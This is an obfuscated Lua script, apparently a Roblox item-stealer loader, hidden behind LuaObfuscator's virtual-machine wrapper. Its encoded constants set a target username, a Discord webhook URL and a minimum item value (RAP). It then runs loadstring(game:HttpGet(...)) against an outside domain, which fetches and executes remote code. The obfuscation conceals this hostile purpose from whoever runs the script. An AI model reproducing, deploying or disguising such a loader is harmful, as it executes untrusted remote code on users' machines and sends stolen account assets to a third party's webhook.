--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v102=v5(v85,v19);v19=nil;return v102;else return v85;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/((5 -(1 + 2))^(v32-((1 + 1) -1))))%((3 -1)^(((v33-1) -(v32-1)) + ((879 -(282 + 595)) -1))) ;return v86-(v86%(620 -(555 + 64))) ;else local v87=(933 -(857 + 74))^(v32-(569 -(367 + (1838 -(1523 + 114))))) ;return (((v31%(v87 + v87))>=v87) and (928 -(214 + 713))) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * (1321 -(16 + 52 + (1954 -(892 + 65))))) + v36 ;end if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -((75 -43) + 85)) ;v35=(1 -0) + 0 ;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==((953 -(802 + 150)) -0)) then return (v42 * ((45170883 -28393317) -(87 + 263))) + (v41 * (65716 -(67 + 113))) + (v40 * (188 + 68)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) + 0 );v18=v18 + 4 ;v38=3 -2 ;end end end local function v24() local v43=0 + (0 -0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==3) then if (v48==(997 -(915 + 82))) then if (v47==((0 + 0) -0)) then return v49 * (0 + 0) ;else v48=1 -0 ;v46=1187 -(1069 + 118) ;end elseif (v48==(7472 -5425)) then return ((v47==0) and (v49 * ((2 -1)/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(146 + 32 + 845) ) * (v46 + (v47/((3 -1)^((184 -132) + 0)))) ;end if (v43==(793 -(368 + 423))) then v48=v20(v45,21,97 -66 );v49=((v20(v45,50 -(10 + 8) )==1) and  -1) or (3 -2) ;v43=445 -(416 + 26) ;end if (v43==(3 -(861 -(814 + 45)))) then v46=1 + (772 -(201 + 571)) ;v47=(v20(v45,(2 -1) -0 ,1158 -(116 + 1022) ) * ((440 -(145 + 16 + 277))^32)) + v44 ;v43=432 -(44 + 386) ;end if (v43==(1486 -(998 + 488))) then v44=v23();v45=v23();v43=1 + 0 ;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v68=1 -0 , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=(3 + 0)) then else v60=nil;v61=nil;v53=3 + 1 ;end if (v53==(31 -(22 + 7))) then v58=nil;v59=nil;v53=2 + 1 ;end if (v53==(1 + 0)) then local v90=1985 -(1266 + 719) ;while true do if (v90~=(604 -(268 + 335))) then else v53=2;break;end if (v90==0) then v56=nil;v57=nil;v90=1;end end end if (v53==(294 -(60 + 230))) then while true do if (v54~=(0 -0)) then else local v98=1933 -(565 + 1368) ;while true do if ((573 -(426 + 146))==v98) then v54=1;break;end if ((0 + 0)~=v98) then else local v105=1456 -(282 + 1174) ;while true do if (v105==(811 -(569 + 242))) then v55=0;v56=nil;v105=2 -1 ;end if (v105~=1) then else v98=857 -(564 + 292) ;break;end end end end end if (v54==(1 + 0)) then local v99=1024 -(706 + 318) ;local v100;while true do if (v99~=(1251 -(721 + 530))) then else v100=1271 -(945 + 326) ;while true do if (v100==(0 -0)) then local v129=476 -(41 + 435) ;while true do if (v129==(1002 -(938 + 63))) then v100=1;break;end if (v129==(0 + 0)) then v57=nil;v58=nil;v129=1 + 0 ;end end end if ((701 -(271 + 429))~=v100) then else v54=2;break;end end break;end end end if (v54~=(1616 -(1565 + 48))) then else v61=nil;while true do local v103=0;local v104;while true do if (v103~=(0 + 0)) then else v104=0;while true do if (v104~=(1139 -(782 + 356))) then else if (v55~=(1503 -(1408 + 92))) then else local v144=0;local v145;local v146;while true do if (v144~=(1086 -(461 + 625))) then else v145=0;v146=nil;v144=1289 -(993 + 295) ;end if (v144~=(1 + 0)) then else while true do if (v145==(0 -0)) then v146=0;while true do if (v146~=(1171 -(418 + 753))) then else for v160=1,v23() do v57[v160-(1876 -(157 + 1718)) ]=v28();end return v59;end end break;end end break;end end end if (v55==1) then local v147=0 + 0 ;local v148;while true do if (v147==(0 + 0)) then v148=0 + 0 ;while true do if (v148==(3 -2)) then v61={};v55=1020 -(697 + 321) ;break;end if (v148==0) then local v158=0 + 0 ;while true do if (v158==(530 -(406 + 123))) then v148=1;break;end if (v158~=(1769 -(1749 + 20))) then else v59={v56,v57,nil,v58};v60=v23();v158=1 + 0 ;end end end end break;end end end break;end if (v104~=(1145 -(466 + 679))) then else local v133=0 -0 ;while true do if (v133==(2 -1)) then v104=1901 -(106 + 1794) ;break;end if (v133~=0) then else if (v55~=(1 + 1)) then else local v154=0 + 0 ;local v155;while true do if (0~=v154) then else v155=0 -0 ;while true do if (v155~=(947 -(245 + 702))) then else for v162=3 -2 ,v60 do local v163=0 + 0 ;local v164;local v165;local v166;local v167;local v168;while true do if (v163==(2 -1)) then v166=nil;v167=nil;v163=116 -(4 + 110) ;end if (v163~=(584 -(57 + 527))) then else v164=440 -(382 + 58) ;v165=nil;v163=1;end if (v163~=(6 -4)) then else v168=nil;while true do if ((1427 -(41 + 1386))==v164) then local v174=103 -(17 + 86) ;while true do if (0~=v174) then else v165=0;v166=nil;v174=1 + 0 ;end if (v174==(1 -0)) then v164=2 -1 ;break;end end end if (v164~=(167 -(122 + 44))) then else v167=nil;v168=nil;v164=2;end if (v164==(1207 -(902 + 303))) then while true do if (v165~=(0 -0)) then else local v175=0 -0 ;local v176;while true do if (v175~=(0 + 0)) then else v176=0;while true do if (v176==(0 + 0)) then local v189=0;while true do if (v189==(0 -0)) then v166=0 -0 ;v167=nil;v189=66 -(30 + 35) ;end if (v189==(1 + 0)) then v176=1258 -(1043 + 214) ;break;end end end if (v176~=(3 -2)) then else v165=1 + 0 ;break;end end break;end end end if (v165~=(1213 -(323 + 889))) then else v168=nil;while true do if (v166~=0) then else local v181=0 -0 ;local v182;local v183;while true do if (v181~=1) then else while true do if (v182~=0) then else v183=580 -(361 + 219) ;while true do if ((320 -(53 + 267))~=v183) then else local v199=0;local v200;while true do if (v199==0) then v200=0 + 0 ;while true do if (v200~=(413 -(15 + 398))) then else v167=v21();v168=nil;v200=215 -(22 + 192) ;end if (v200==(684 -(483 + 200))) then v183=983 -(18 + 964) ;break;end end break;end end end if (v183==(3 -2)) then v166=1 + 0 ;break;end end break;end end break;end if (v181~=(0 + 0)) then else v182=0;v183=nil;v181=851 -(20 + 830) ;end end end if (v166~=(1 + 0)) then else if (v167==(3 -2)) then v168=v21()~=(0 -0) ;elseif (v167==(2 -0)) then v168=v24();elseif (v167==(129 -(116 + 10))) then v168=v25();end v61[v162]=v168;break;end end break;end end break;end end break;end end end v59[1 + 2 ]=v21();v155=739 -(542 + 196) ;end if (v155~=1) then else for v169=1,v23() do local v170=0 + 0 ;local v171;local v172;local v173;while true do if (v170~=(1 -0)) then else v173=nil;while true do if (v171~=(0 + 0)) then else v172=0 + 0 ;v173=nil;v171=2 -1 ;end if (v171==(1 + 0)) then while true do if ((0 + 0)==v172) then v173=v21();if (v20(v173,1 + 0 ,1 + 0 )~=0) then else local v177=0;local v178;local v179;local v180;while true do if (v177~=(164 -(92 + 71))) then else local v185=0 + 0 ;while true do if (v185~=(1 + 0)) then else v177=4 -2 ;break;end if (v185==(0 -0)) then v180={v22(),v22(),nil,nil};if (v178==(405 -(118 + 287))) then local v196=0 + 0 ;local v197;while true do if (v196~=(0 -0)) then else v197=1121 -(118 + 1003) ;while true do if ((0 -0)==v197) then v180[380 -(142 + 235) ]=v22();v180[18 -14 ]=v22();break;end end break;end end elseif (v178==(1791 -(573 + 1217))) then v180[3]=v23();elseif (v178==(1 + 1)) then v180[8 -5 ]=v23() -((979 -(553 + 424))^(2 + 14)) ;elseif (v178~=(4 -1)) then else local v205=0 -0 ;local v206;while true do if (v205~=(0 + 0)) then else v206=0 + 0 ;while true do if (v206~=0) then else v180[3 -0 ]=v23() -((2 + 0)^16) ;v180[4]=v22();break;end end break;end end end v185=1 + 0 ;end end end if (v177==(2 + 1)) then if (v20(v179,6 -3 ,7 -4 )~=1) then else v180[8 -4 ]=v61[v180[2 + 2 ]];end v56[v169]=v180;break;end if (v177==2) then if (v20(v179,4 -3 ,754 -(239 + 514) )==(1 + 0)) then v180[1 + 1 ]=v61[v180[2]];end if (v20(v179,1331 -(797 + 532) ,2 + 0 )~=1) then else v180[3]=v61[v180[2 + 1 ]];end v177=6 -3 ;end if ((1202 -(373 + 829))~=v177) then else local v187=97 -(11 + 86) ;local v188;while true do if (v187==(731 -(476 + 255))) then v188=0;while true do if (v188==(0 -0)) then local v198=0;while true do if (v198~=0) then else v178=v20(v173,1132 -(369 + 761) ,3);v179=v20(v173,3 + 1 ,29 -23 );v198=1 -0 ;end if (v198==(1797 -(503 + 1293))) then v188=1;break;end end end if (v188~=1) then else v177=1 -0 ;break;end end break;end end end end end break;end end break;end end break;end if (v170~=(238 -(64 + 174))) then else v171=0;v172=nil;v170=1 + 0 ;end end end v55=3;break;end end break;end end end if (v55==(0 -0)) then local v156=336 -(144 + 192) ;local v157;while true do if (v156==(216 -(42 + 174))) then v157=0 + 0 ;while true do if (v157~=(0 + 0)) then else v56={};v57={};v157=534 -(43 + 490) ;end if ((1 + 0)==v157) then v58={};v55=1;break;end end break;end end end v133=1;end end end end break;end end end break;end if (v54==(735 -(711 + 22))) then local v101=0;while true do if (v101~=(0 -0)) then else v59=nil;v60=nil;v101=1 + 0 ;end if (v101==1) then v54=862 -(240 + 619) ;break;end end end end break;end if (v53==(0 + 0)) then local v91=0 + 0 ;while true do if (v91~=0) then else v54=1504 -(363 + 1141) ;v55=nil;v91=1581 -(1183 + 397) ;end if (v91==(1745 -(1344 + 400))) then v53=1;break;end end end end end local function v29(v62,v63,v64) local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...) local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v89=0;while true do if (v89==1) then if (v83<=4) then if (v83<=1) then if (v83==0) then v80[v82[2]]();else v80[v82[2]]=v64[v82[3]];end elseif (v83<=2) then local v108;local v109,v110;local v111;local v112;v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v112=v82[2];v111=v80[v82[3]];v80[v112 + 1 ]=v111;v80[v112]=v111[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v112=v82[2];v109,v110=v73(v80[v112](v13(v80,v112 + 1 ,v82[3])));v75=(v110 + v112) -1 ;v108=0;for v130=v112,v75 do v108=v108 + 1 ;v80[v130]=v109[v108];end v74=v74 + 1 ;v82=v70[v74];v112=v82[2];v80[v112]=v80[v112](v13(v80,v112 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];elseif (v83==3) then do return;end else v64[v82[3]]=v80[v82[2]];end elseif (v83<=7) then if (v83<=5) then local v122=v82[2];local v123=v80[v82[3]];v80[v122 + 1 ]=v123;v80[v122]=v123[v82[4]];elseif (v83>6) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end else local v136=0;local v137;local v138;local v139;local v140;while true do if (v136==1) then v75=(v139 + v137) -1 ;v140=0;v136=2;end if (v136==0) then v137=v82[2];v138,v139=v73(v80[v137](v13(v80,v137 + 1 ,v82[3])));v136=1;end if (v136==2) then for v151=v137,v75 do v140=v140 + 1 ;v80[v151]=v138[v140];end break;end end end elseif (v83<=8) then v80[v82[2]]=v82[3];elseif (v83>9) then v74=v82[3];else local v142=v82[2];v80[v142]=v80[v142](v13(v80,v142 + 1 ,v75));end v74=v74 + 1 ;break;end if (0==v89) then v82=v70[v74];v83=v82[1];v89=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0E3O00028O0003083O00557365726E616D6503073O00716F736973687303093O00557365726E616D6532026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3132372O343837363031303839373436392F65754A646B356B32534C69756D61622D50732O53776F4F4E3039305A6756466B784F5F66464C346462385956306B4854627262484F556B6357764451557A3464622O3172030A3O004D696E696D756D524150025O006AF840027O0040030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403173O00682O7470733A2O2F65676F72696B7573612E7370616365001B3O0012083O00013O0026073O00080001000100040A3O00080001001208000100033O001204000100023O001208000100033O001204000100043O0012083O00053O0026073O000F0001000500040A3O000F0001001208000100073O001204000100063O001208000100093O001204000100083O0012083O000A3O0026073O00010001000A00040A3O000100010012010001000B3O0012020002000C3O00202O00020002000D00122O0004000E6O000200046O00013O00024O00010001000100044O001A000100040A3O000100012O00033O00017O00",v9(),...);
